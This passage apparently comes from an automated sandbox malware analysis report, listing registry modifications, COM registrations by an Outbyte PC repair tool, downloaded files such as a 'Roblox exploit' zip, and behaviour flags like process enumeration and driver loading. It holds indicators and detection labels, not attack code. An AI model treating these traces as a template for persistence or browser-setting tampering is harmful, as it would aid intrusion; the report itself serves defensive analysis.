IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "227" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "42" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cbaa22893fabb44cbe4ac4777554c32e00000000020000000000106600000001000020000000956ac061ac5ca466daea7fd16f36666475e45b5ffb5edd89d05b9a5ea19e3c43000000000e80000000020000200000006cd33c3e051b6b6ae8be57d4f8ba3fd6d8f13b458c69ee39791b9b77620b2708f0010000c1ba46050b52edd6c7630db88f5469806b4a13c1fb78a972c9a78cee3c206553ed6a3adf52500a75e64b80be227aa035f52f6cc5e18826e393117915a1c111e6d70fab10a6bdd374129d80e8b5386e1506182e0c5b805404f932bd7920bfb82cce126a959342e981201b49b3487dcd919957db15556c439062ea1af32594b18499513136b14ab235ce3e3584d87e7e21a573729b2523ca5085ad03dff7ac6b1ca90f6f3099a5f3f6d53ac190c4777ba40968b7cc9e7208965e3c5868a2b305956a640d3370e06b3ee9c9228a28e3a3135535b9d3dda22ae86364bc6d22157ecad107a33e0b9eab6db2506c1bd97c0154d414659051a82ec62dc38bee5105ff02eab3ecce8dce37cbbb8e3d527304178959433be6680c32805a63f5fc7f6a07b905f5cb608d0676a49686fbc34c896a64f851f2630d6e51331c6d6c5760944b964e96521db9a341485f36a9aebebcfbac0bdaba90779144777717cb8c01806142b9c11c74f612267e1f4a4a860b547193d9c0e99034036dfbfdb8bf5c742d584329bada662a93664ff7f9769630804a616277419638dd231641da9f0f64211c7f4cba4822b2282cfe2886184e1e46bff895bdce4dc4242a5a1515e4cd11e32e2f364c7957b2004e39c862db68ce4e389801023a35b461861ba5e23d7bbfe970f37dd1787f0fce7cb2cef5a5c06b513a854000000009c2405eff659cf94b10bbd0babfc9d6f0d947d69b1f308339a030b6f661be7f8034b83fe56f2cc613932ebaf1e480da351a609e11358a03026626ea5bc60e9d iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION\4DDiG DLL Fixer.exe = "1" 4DDiG DLL Fixer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31119773" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "122" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "227" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "383" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "3685716108" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Suggested Sites\MigrationTime = 6757cf265bd2da01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "209" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "276" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.22000.1\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cbaa22893fabb44cbe4ac4777554c32e0000000002000000000010660000000100002000000066e1ee620be7ab349c185cd24987f996fe93ad31d96b30e410c3d36ff1f6da86000000000e80000000020000200000005f91e295e9f2a4358be158d92ecc541b70f55e8b81e5b887d37214f6885395851000000021b24d9becd701e066d1996d80f84f7740000000ae715bb9d091048110f3c8383c328af3041e6f615a26e84c984775271951bc1fa1c352a60d19fdf6dc923478e3517c6b497ac6a0d69727050e3093cb420b5777 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "222" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\ImageStoreRandomFolder = "8zqcn7c" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "209" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 6757cf265bd2da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\4DDiG DLL Fixer.exe = "11000" 4DDiG DLL Fixer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "378" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cbaa22893fabb44cbe4ac4777554c32e000000000200000000001066000000010000200000003894462cf4171e7b22d7ca26741e947f78b8a079620b339d96b33f8554c6d9ff000000000e8000000002000020000000d87fe98306ad8be66f772c1417647b81b18329fe7d1d11c51b6639e07fc894cc1000000047762d942bf541b67c0bcb89fd4633fd400000002ee92fe1c37a66209ecd9980beefb00038ec2e05dedd2c6494f6bd2e2457a25a40ebda0d7cc58d88d363ca4c66ec085544562df632cf4649b065aeb71f4d1823 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cbaa22893fabb44cbe4ac4777554c32e0000000002000000000010660000000100002000000030d8990553c8982a6309bf0d4b3be66442d95168c7449513fcdca4aa4c540709000000000e8000000002000020000000cc30917cb599e0750cfdef24b94d740cb5d9f9196b3d7ebafb4f70fd9b3a9959200000006bf612ff05481b048fe0723b1e913f470274ef97ea2d611607788524b628176540000000d72f761d065504f4d7166b5cff64d390aa67aa377ef2b47f3ac6e22185c57790336cecbd8198c7446150f158202550fffe0a7f8fae9a5677ddbd191a16563fdd iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "22" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DA6A490B-4560-11EF-84EA-FAF02496AEE6} = "0" iexplore.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://go.microsoft.com/fwlink/p/?LinkId=255141" iexplore.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "109" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\ProgID\ = "BrowserPluginsAgentCOM32.BrowserPluginsAgent32" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.arm64,arm64,14.40,bundle\Dependents VC_redist.arm64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pcr\URL Protocol PCRepair.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2266207E-516A-4191-B021-F636937AE8CB}\TypeLib\ = "{77362D00-906F-4DED-8A74-A3F155558C37}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\InprocServer32\ = "C:\\PROGRA~2\\Outbyte\\PCREPA~1\\BROWSE~3.DLL" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{16870BDE-2DD8-43FC-B754-69B9F9F2EC37}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\TypeLib\ = "{F2C6F7D1-ED32-49E5-9919-69E12C17AF7C}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3CC2E0D5-193C-4192-B8BA-AFEF0AB6A2FD}\ = "IBrowserPluginsAgent64" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3CC2E0D5-193C-4192-B8BA-AFEF0AB6A2FD}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\InprocServer32\ = "C:\\PROGRA~2\\Outbyte\\PCREPA~1\\BROWSE~3.DLL" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.arm64,arm64,14.40,bundle\ = "{2d48c97b-0c1e-4160-b3c4-c6dabebde745}" VC_redist.arm64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32\Clsid\ = "{93469602-4134-4012-A6BC-F5ED88675F39}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\ProgID\ = "BrowserPluginsAgentCOM64.BrowserPluginsAgent64" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\ProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{16870BDE-2DD8-43FC-B754-69B9F9F2EC37}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\ProgID\ = "BrowserPluginsAgentCOM64.BrowserPluginsAgent64" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2266207E-516A-4191-B021-F636937AE8CB}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{16870BDE-2DD8-43FC-B754-69B9F9F2EC37}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\ = "Outbyte BrowserPluginsAgent32" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\ = "Outbyte BrowserPluginsAgent32" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\AppID = "{93469602-4134-4012-A6BC-E58C2E9A7D28}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2C6F7D1-ED32-49E5-9919-69E12C17AF7C}\1.0\0 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3CC2E0D5-193C-4192-B8BA-AFEF0AB6A2FD}\TypeLib\ = "{F2C6F7D1-ED32-49E5-9919-69E12C17AF7C}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\InprocServer32\ThreadingModel = "Free" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\AppID = "{93469602-4134-4012-A6BC-F5ED88675F39}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM64.BrowserPluginsAgent64\Clsid regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73}\TypeLib\ = "{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2266207E-516A-4191-B021-F636937AE8CB}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\TypeLib\ = "{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}\1.0 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{93469602-4134-4012-A6BC-F5ED88675F39} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM64.BrowserPluginsAgent64\Clsid\ = "{93469602-4134-4012-A6BC-E58C2E9A7D28}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\ProgID regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.arm64,arm64,14.40,bundle VC_redist.arm64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}\1.0\ = "BrowserPluginsAgentCOM32" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\InprocServer32\ThreadingModel = "Free" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\ProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\InprocServer32\ = "C:\\PROGRA~2\\Outbyte\\PCREPA~1\\BROWSE~4.DLL" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\InprocServer32\ThreadingModel = "Free" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}\1.0\0 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A3310BE-83DD-4E80-AC51-242D3A7D7F73}\ = "IBrowserPluginsAgent32" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\ProgID\ = "BrowserPluginsAgentCOM32.BrowserPluginsAgent32" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BrowserPluginsAgentCOM32.BrowserPluginsAgent32\Clsid\ = "{93469602-4134-4012-A6BC-F5ED88675F39}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{93469602-4134-4012-A6BC-E58C2E9A7D28}\ = "Outbyte BrowserPluginsAgent64" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2C6F7D1-ED32-49E5-9919-69E12C17AF7C}\1.0\FLAGS\ = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{16870BDE-2DD8-43FC-B754-69B9F9F2EC37} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\TypeLib\ = "{F2C6F7D1-ED32-49E5-9919-FDF6143A53E1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{93469602-4134-4012-A6BC-F5ED88675F39}\AppID = "{93469602-4134-4012-A6BC-F5ED88675F39}" regsvr32.exe -
NTFS ADS 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Exter-Roblox-Exploit-V0.1-main.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 791215.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\outbyte-pc-repair.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 126415.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\4ddig-dll-fixer.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 474978.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\VC_redist.arm64.exe:Zone.Identifier msedge.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3200 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4508 msedge.exe 4508 msedge.exe 3244 msedge.exe 3244 msedge.exe 276 identity_helper.exe 276 identity_helper.exe 2348 msedge.exe 2348 msedge.exe 2500 msedge.exe 2500 msedge.exe 4488 powershell.exe 4488 powershell.exe 4488 powershell.exe 480 powershell.exe 480 powershell.exe 4016 msedge.exe 4016 msedge.exe 1676 msedge.exe 1676 msedge.exe 2840 msedge.exe 2840 msedge.exe 2392 identity_helper.exe 2392 identity_helper.exe 1148 msedge.exe 1148 msedge.exe 1544 powershell.exe 1544 powershell.exe 2344 msedge.exe 2344 msedge.exe 2140 msedge.exe 2140 msedge.exe 3740 identity_helper.exe 3740 identity_helper.exe 660 msedge.exe 660 msedge.exe 3116 msedge.exe 3116 msedge.exe 1684 msedge.exe 1684 msedge.exe 1684 msedge.exe 1684 msedge.exe 3372 msedge.exe 3372 msedge.exe 4780 Installer.exe 4780 Installer.exe 1536 ServiceHelper.Agent.exe 1536 ServiceHelper.Agent.exe 3336 ServiceHelper.Agent.exe 3336 ServiceHelper.Agent.exe 772 PCRepair.exe 772 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 676 Process not Found 676 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
